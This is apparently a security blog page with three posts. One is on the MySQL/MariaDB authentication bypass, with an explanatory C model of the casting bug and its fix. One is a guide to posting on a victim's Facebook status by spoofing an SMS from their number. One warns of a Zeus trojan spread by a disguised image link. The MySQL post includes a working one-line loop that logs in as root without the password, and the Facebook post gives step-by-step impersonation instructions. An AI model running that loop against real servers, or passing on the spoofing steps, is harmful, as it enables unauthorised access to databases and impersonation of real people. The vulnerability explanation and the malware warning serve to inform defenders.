Recently a serious vulnerability inside MySQL has been found. According to the advisory, the following versions are affected: 5.5.23, 5.3.6, 5.2.12, 5.1.62. This is not the first time an authentication vulnerability has been found inside MySQL, yet the developers failed to protect against it.
So what was the fault? How and why is MySQL authentication affected? According to the researchers, the MySQL authentication check rejected a wrong password only 255 times out of 256, which means that one in 256 attempts with a wrong password might let you in. Exploiting this vulnerability takes nothing more than this one-line shell loop:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256."
"Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent. Any client will do, there's no need for a special libmysqlclient library."
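To show the casting defect the advisory describes, here is an added example (not code from the MySQL or MariaDB source) that models the comparison in the server's check_scramble() routine: the int returned by memcmp() is narrowed to my_bool, MySQL's one-byte char typedef, so any nonzero result that is a multiple of 256 collapses to 0 and is read as "match". The function name and typedef are from the MySQL source as I know it, not from the advisory quoted above, and the memcmp() results fed in below are constructed, not captured from a real libc.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef char my_bool;   /* MySQL's historical boolean type: a single byte */

/* Vulnerable shape: memcmp()'s int result is narrowed to a one-byte my_bool.
   Nonzero means "mismatch"; 256 or -512 become 0, so a wrong password passes. */
my_bool scramble_mismatch_vulnerable(int memcmp_result)
{
    return (my_bool)memcmp_result;      /* int -> char: high bits are dropped */
}

/* Fixed shape: reduce to 0 or 1 before the result is narrowed, so no
   nonzero value can be lost in the conversion. */
my_bool scramble_mismatch_fixed(int memcmp_result)
{
    return (my_bool)(memcmp_result != 0);
}

/* How a token compare should look: constant-time, byte-for-byte, and never
   dependent on the magnitude of a libc memcmp() return value. */
int token_mismatch_ct(const uint8_t *a, const uint8_t *b, size_t n)
{
    uint8_t diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= (uint8_t)(a[i] ^ b[i]);
    return diff != 0;
}

/* Count the nonzero memcmp() results in [lo, hi] that the vulnerable check
   accepts as a match: one value in every 256, matching the advisory's odds. */
int count_false_accepts(int lo, int hi)
{
    int n = 0;
    for (int r = lo; r <= hi; r++)
        if (r != 0 && scramble_mismatch_vulnerable(r) == 0)
            n++;
    return n;
}

int main(void)
{
    /* Constructed: an optimised memcmp() may return any nonzero int, not only +/-1. */
    int simulated = 256;
    printf("vulnerable says mismatch=%d, fixed says mismatch=%d, false accepts in [-4096,4095]=%d\n",
           scramble_mismatch_vulnerable(simulated), scramble_mismatch_fixed(simulated),
           count_false_accepts(-4096, 4095));
    return 0;
}
```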
Countermeasures
Patch your MySQL or MariaDB installations if you haven't already.
There are tons of Facebook users who use a feature called Facebook Texts to update their Facebook status. If you have enabled this feature, all you need to do to update your status is to type your status and send it by SMS to "923223265".
However, the idea behind this Facebook status hack is to send a fake SMS that appears to come from your friend's number; Facebook will then think the message came from the legitimate source and update the victim's status.
SMS Global
SMSGlobal is a website that allows you to send fake SMS. The free account only allows you to send 25 SMS, while the business account allows you to send more. All you need to do is register on SMSGlobal and activate your account. After logging in to your account, click on "Send SMS to a Number".
Send SMS To: 923223265 (Facebook)
Sender ID (From): the victim's mobile number.
Message: the status you would like to have posted.
Facebook Hacking: Beware! New Picture Worm Hits Facebook Today!
For the last few months, Facebook has been widely targeted for scams and for spreading malware (viruses!). I discovered one of these spreading worms recently while chatting with a friend, when the following message suddenly appeared:
Hehe!!! Lool http://tinyurl.com/Wooo-2841-jpg
From the above screenshot, you can clearly see that TinyURL has been used to shorten the link. One more thing to note is that it is not an image file: the link ends with "-jpg", not with the ".jpg" extension.
The above screenshot gives a clearer picture of what you are going to download along with the JPG file. The .exe is basically a Zeus trojan. Zeus is one of the most popular botnets used for stealing sensitive information such as passwords and credit card numbers. One of its popular features is its anti-VM and anti-sandbox capability, which makes testing it inside virtual environments useless.
A scan at VirusTotal shows that only 3 of 18 URL scanners were able to detect it as a malware site; the rest failed.
Kindly spread the news by sharing my blog with your friends and people you may know, so they do not fall for this malware.